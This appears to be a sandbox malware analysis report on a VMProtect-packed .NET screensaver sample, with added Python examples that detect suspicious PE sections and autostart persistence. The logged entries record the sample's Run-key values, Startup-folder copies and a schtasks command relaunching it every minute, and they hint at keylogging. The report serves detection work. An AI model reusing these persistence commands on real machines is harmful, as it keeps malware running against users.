Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.ni.pdb source: WER96C9.tmp.dmp.13.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER96C9.tmp.dmp.13.dr

Data Obfuscation

Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, 50D14BCC.cs | .Net Code: _183F70EC
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr.0.dr, g.cs | .Net Code: g System.Reflection.Assembly.Load(byte[])
Source: wininit.scr.0.dr, 50D14BCC.cs | .Net Code: _183F70EC
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr.2.dr, g.cs | .Net Code: g System.Reflection.Assembly.Load(byte[])
Source: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr0.2.dr, g.cs | .Net Code: g System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Code function: 0_2_0144BC88 push eax; ret 0_2_0144BC8A
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Code function: 0_2_02DD0BE8 push eax; mov dword ptr [esp], edx 0_2_02DD0FCC
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Code function: 0_2_02DD6296 push ebx; retf 0_2_02DD6298
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Code function: 0_2_02DD416E push FFFFFF8Bh; iretd 0_2_02DD4170
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Code function: 2_2_00007FF848352E4B push ebx; ret 2_2_00007FF848352E5A
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Static PE information: section name: .vmp0
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Static PE information: section name: .vmp1
Source: wininit.scr.0.dr | Static PE information: section name: .vmp0
Source: wininit.scr.0.dr | Static PE information: section name: .vmp1
Source: initial sample | Static PE information: section where entry point is pointing to: .vmp1
Source: initial sample | Static PE information: section name: .vmp1 entropy: 7.2244685170682175 (2 identical entries)
Source: initial sample | Static PE information: section name: .text entropy: 6.886643321135571 (3 identical entries)
Source: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, FCYuTLHTkyUIRojNPvQVdTyIIGLipwbnnDHKCapi.cs | High entropy of concatenated method names: 'GetAsyncKeyState', 'dar', 'Main', 'ecWolIeDJFQTiEFPYTwMfzSNCiqrpufZgKXWmqtkKZSCjlHjnCMguhUuRQsZrdhHhsmFCYuTLHTkyUIRojNPvQVdTy', 'Scatch', 'EBuNKhRbhdpGHcenLsWlSYrzpVQQPUFxFjKvMPSKiM', 'poakzdpoazkdpazodazopdkazdpkaz', 'RBLRNZpFMOXupTVCIbjYEzzyEovDTtsJyCtSvaYGuP', 'rxtGJYtuEOJmCUoICrXghfkVOVzNMcfiazOHrZbvYd', 'sYvOaOMGYVrbmrozRSnoxWDgvciCKzfabZePIQtV'
Source: wininit.scr.0.dr, FCYuTLHTkyUIRojNPvQVdTyIIGLipwbnnDHKCapi.cs | High entropy of concatenated method names: 'GetAsyncKeyState', 'dar', 'Main', 'ecWolIeDJFQTiEFPYTwMfzSNCiqrpufZgKXWmqtkKZSCjlHjnCMguhUuRQsZrdhHhsmFCYuTLHTkyUIRojNPvQVdTy', 'Scatch', 'EBuNKhRbhdpGHcenLsWlSYrzpVQQPUFxFjKvMPSKiM', 'poakzdpoazkdpazodazopdkazdpkaz', 'RBLRNZpFMOXupTVCIbjYEzzyEovDTtsJyCtSvaYGuP', 'rxtGJYtuEOJmCUoICrXghfkVOVzNMcfiazOHrZbvYd', 'sYvOaOMGYVrbmrozRSnoxWDgvciCKzfabZePIQtV'
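The static PE entries in this section (VMProtect section names .vmp0/.vmp1, the entry point pointing into .vmp1, per-section entropy) and the earlier "Static PE information" entries (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, the DllCharacteristics flags) are all readable from the PE headers without running the file. The Python below is an added example written for this page; it is not Joe Sandbox code and not code from the sample. Because the sample itself is not embedded, it assembles a constructed PE32 image with the same shape (a .text section, VMProtect-named sections, entry point in .vmp1, a CLR header) and then parses it back the way a triage script would. The list of "standard" section names, the 7.0 entropy threshold and the fixture's contents are assumptions chosen for illustration.

```python
"""Static PE checks: section names and entropy, entry-point section, CLR header, DllCharacteristics.
Added example for this page; the PE image is a constructed fixture, not the report's sample."""
import math
import random
import struct

IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14           # CLR header slot: present => managed (.NET) image
DLL_CHARACTERISTICS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
                       0x0400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE"}
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                     ".edata", ".pdata", ".bss", ".tls"}           # assumption: "normal" linker output
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")         # IMAGE_SECTION_HEADER, 40 bytes
FILE_ALIGN, SECT_ALIGN = 0x200, 0x1000
HIGH_ENTROPY = 7.0                                  # assumption: packed/encrypted data scores above this


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def _align(n: int, a: int) -> int:
    return -(-n // a) * a


def build_sample_pe(sections, entry_rva, dll_chars, clr_rva=0) -> bytes:
    """Assemble a minimal PE32 image: DOS stub, COFF header, optional header, section table, raw data."""
    hdr_len = _align(64 + 4 + 20 + 224 + len(sections) * SECTION_HDR.size, FILE_ALIGN)
    sec_hdrs, raw, va, ptr = b"", b"", SECT_ALIGN, hdr_len
    for name, data in sections:
        raw_size = _align(len(data), FILE_ALIGN)
        sec_hdrs += SECTION_HDR.pack(name.encode().ljust(8, b"\0"), len(data), va,
                                     raw_size, ptr, 0, 0, 0, 0, 0x60000020)
        raw += data.ljust(raw_size, b"\0")
        va += _align(max(len(data), 1), SECT_ALIGN)
        ptr += raw_size
    # Optional header (PE32, 224 bytes): magic, linker version, sizes, entry point, bases, alignments, ...
    opt = struct.pack("<HBB" + "I" * 9, 0x10B, 14, 0, 0, 0, 0, entry_rva,
                      SECT_ALIGN, SECT_ALIGN, 0x400000, SECT_ALIGN, FILE_ALIGN)
    opt += struct.pack("<" + "H" * 6, 4, 0, 0, 0, 6, 0)          # OS / image / subsystem versions
    opt += struct.pack("<" + "I" * 4 + "HH" + "I" * 6, 0, va, hdr_len, 0, 2, dll_chars,
                       0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    if clr_rva:
        dirs[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] = (clr_rva, 72)
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x0102)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)            # e_lfanew at offset 0x3C
    return (dos + b"PE\0\0" + coff + opt + sec_hdrs).ljust(hdr_len, b"\0") + raw


def inspect_pe(image: bytes) -> dict:
    """Return section entropies, the entry-point section, CLR presence, DllCharacteristics and findings."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        raise ValueError("not a PE image")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", image, coff + 2)
    (opt_size,) = struct.unpack_from("<H", image, coff + 16)
    opt = coff + 20
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    (entry_rva,) = struct.unpack_from("<I", image, opt + 16)
    (dll_chars,) = struct.unpack_from("<H", image, opt + 70)
    (num_dirs,) = struct.unpack_from("<I", image, opt + 92)
    clr_rva = 0
    if num_dirs > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR:
        clr_rva = struct.unpack_from("<I", image, opt + 96 + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR)[0]
    sections, entry_section = [], None
    for i in range(num_sections):
        name, vsize, va, rsize, rptr, *_ = SECTION_HDR.unpack_from(image, opt + opt_size + i * SECTION_HDR.size)
        name = name.rstrip(b"\0").decode("ascii", "replace")
        sections.append({"name": name, "rva": va, "entropy": shannon_entropy(image[rptr:rptr + rsize])})
        if va <= entry_rva < va + max(vsize, rsize):
            entry_section = name
    findings = [f"non-standard section name: {s['name']}" for s in sections if s["name"] not in STANDARD_SECTIONS]
    findings += [f"high-entropy section: {s['name']} ({s['entropy']:.2f})" for s in sections if s["entropy"] >= HIGH_ENTROPY]
    if entry_section not in STANDARD_SECTIONS:
        findings.append(f"entry point lies outside standard sections: {entry_section}")
    if clr_rva:
        findings.append("IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR present: managed (.NET) image")
    return {"sections": sections, "entry_section": entry_section, "is_dotnet": bool(clr_rva),
            "dll_characteristics": [n for bit, n in DLL_CHARACTERISTICS.items() if dll_chars & bit],
            "findings": findings}


# Constructed fixture shaped like the report's findings: VMProtect-named sections, entry point in .vmp1.
SAMPLE_PE = build_sample_pe(
    sections=[(".text", bytes(range(16)) * 256),                   # 16 equiprobable bytes: entropy exactly 4.0
              (".vmp0", b"\0" * 512),                              # empty stub section
              (".vmp1", random.Random(1331098).randbytes(4096))],  # near-random bytes standing in for packed code
    entry_rva=0x3010,       # inside .vmp1
    dll_chars=0x8540,       # DYNAMIC_BASE | NX_COMPAT | NO_SEH | TERMINAL_SERVER_AWARE
    clr_rva=0x1008)         # CLR header inside .text

if __name__ == "__main__":
    result = inspect_pe(SAMPLE_PE)
    for s in result["sections"]:
        print(f"{s['name']:<6} rva=0x{s['rva']:04x} entropy={s['entropy']:.4f}")
    print("entry point section:", result["entry_section"], "| .NET:", result["is_dotnet"])
    print("DllCharacteristics:", ", ".join(result["dll_characteristics"]))
    for f in result["findings"]:
        print("-", f)
```

Run it against a real file with `inspect_pe(open(path, "rb").read())`. Entropy alone is a weak signal (compressed resources also score high), so the script only reports it together with the other two structural facts the sandbox flags: a section name no common linker emits, and an entry point that sits inside such a section rather than in .text.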

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr (2 identical entries)
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | File created: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr (2 identical entries)
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | File created: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr (2 identical entries)
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | File created: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\wininit.scr (2 identical entries)

Boot Survival

Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Stata
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Stata C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0wininit.scr
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Process created: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ" /tr "C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr"
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr (2 identical entries)
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Stata (2 identical entries)
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ (2 identical entries)
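The Persistence and Boot Survival entries above record three user-level autostart mechanisms pointing at the same dropped .scr: two HKCU Run values, a copy in the Start Menu Startup folder, and a schtasks.exe task that re-launches it every minute (/sc minute /mo 1). Each on its own is common in legitimate software; together, and pointing into %AppData%, they are the pattern behind the "Creates multiple autostart registry keys" and "Uses schtasks.exe" signatures. The Python below is an added example written for this page, not Joe Sandbox code and not the sample's code. It applies those checks to a constructed event list modelled on the entries above and correlates the mechanisms by launched file name. The event schema, the list of user-writable directories, the suspicious-extension list and the 5-minute interval threshold are assumptions.

```python
"""Autostart-persistence checks over a constructed event log (added example, not sandbox code)."""
import ntpath
import re
from collections import defaultdict

RUN_KEYS = ("\\currentversion\\run", "\\currentversion\\runonce")
STARTUP_DIR = "\\microsoft\\windows\\start menu\\programs\\startup\\"
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\", "\\users\\public\\", "\\temp\\")  # assumption
SUSPICIOUS_EXT = (".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js")                         # assumption
MAX_BENIGN_INTERVAL_MIN = 5   # assumption: legitimate software rarely re-launches itself this often


def split_cmdline(cmdline: str) -> list[str]:
    """Tokenise a Windows command line, keeping double-quoted arguments whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_schtasks(cmdline: str):
    """Return the options of a 'schtasks.exe /create ...' command line, or None for anything else."""
    argv = split_cmdline(cmdline)
    if not argv or ntpath.basename(argv[0]).lower() != "schtasks.exe":
        return None
    opts, i = {}, 1
    while i < len(argv):
        flag = argv[i].lower()
        if flag.startswith("/") and i + 1 < len(argv) and not argv[i + 1].startswith("/"):
            opts[flag] = argv[i + 1]      # flag with a value, e.g. /sc minute
            i += 2
        else:
            opts[flag] = True             # bare switch, e.g. /f
            i += 1
    return opts if "/create" in opts else None


def interval_minutes(opts: dict):
    """Convert /sc and /mo to a run interval in minutes; None for non-interval schedules (onlogon, once, ...)."""
    mo = opts.get("/mo", "1")
    mo = int(mo) if isinstance(mo, str) and mo.isdigit() else 1
    return {"minute": mo, "hourly": 60 * mo, "daily": 1440 * mo}.get(str(opts.get("/sc", "")).lower())


def is_user_writable(path: str) -> bool:
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE)


def analyze(events: list[dict]) -> dict:
    """Flag suspicious autostart entries and correlate mechanisms by the launched file's name."""
    targets = defaultdict(set)       # lower-cased file name -> set of autostart mechanisms
    findings = []
    for ev in events:
        if ev["type"] == "registry" and ev["key"].lower().endswith(RUN_KEYS):
            target = ev["data"].strip('"')
            targets[ntpath.basename(target).lower()].add("run_key")
            if is_user_writable(target):
                findings.append(f"Run value '{ev['value']}' points into a user-writable directory: {target}")
            if target.lower().endswith(SUSPICIOUS_EXT):
                findings.append(f"Run value '{ev['value']}' launches a {ntpath.splitext(target)[1]} file")
        elif ev["type"] == "file" and STARTUP_DIR in ev["path"].lower():
            targets[ntpath.basename(ev["path"]).lower()].add("startup_folder")
            findings.append(f"file dropped into the Startup folder: {ev['path']}")
        elif ev["type"] == "process":
            opts = parse_schtasks(ev["cmdline"])
            if opts:
                target = str(opts.get("/tr", ""))
                targets[ntpath.basename(target).lower()].add("scheduled_task")
                minutes = interval_minutes(opts)
                if minutes is not None and minutes <= MAX_BENIGN_INTERVAL_MIN:
                    findings.append(f"task '{opts.get('/tn')}' re-launches {target} every {minutes} minute(s)")
    for name, mechanisms in targets.items():
        if len(mechanisms) >= 2:
            findings.append(f"multiple autostart mechanisms for {name}: {sorted(mechanisms)}")
    return {"findings": findings, "targets": {n: sorted(m) for n, m in targets.items()}}


# Constructed events modelled on the report's entries (not a sandbox export); the vendor updater is a benign control.
RUN_KEY = r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
DROP_NAME = "fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr"
DROP_PATH = ntpath.join(r"C:\Users\user\AppData\Roaming", DROP_NAME)
STARTUP_COPY = ntpath.join(r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", DROP_NAME)
STAGE_PATH = r"C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\wininit.scr"
EVENTS = [
    {"type": "registry", "key": RUN_KEY, "value": "Stata", "data": STAGE_PATH},
    {"type": "registry", "key": RUN_KEY, "value": DROP_NAME[:-4], "data": DROP_PATH},
    {"type": "file", "path": STARTUP_COPY},
    {"type": "process", "cmdline": f'"C:\\Windows\\System32\\schtasks.exe" /create /f /sc minute /mo 1 '
                                   f'/tn "{DROP_NAME[:-4]}" /tr "{DROP_PATH}"'},
    {"type": "registry", "key": RUN_KEY, "value": "VendorUpdater", "data": r"C:\Program Files\Vendor\App\updater.exe"},
]

if __name__ == "__main__":
    for finding in analyze(EVENTS)["findings"]:
        print("-", finding)
```

On a live host the same checks can be fed from Sysmon event IDs 13 (registry value set), 11 (file create) and 1 (process create with command line); the correlation step is what separates this pattern from a single vendor updater that registers one Run value.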
Source: C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe | Process information set: NOOPENFILEERRORBOX (60 identical entries)
Source: C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr | Process information set: NOOPENFILEERRORBOX (43 identical entries)
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
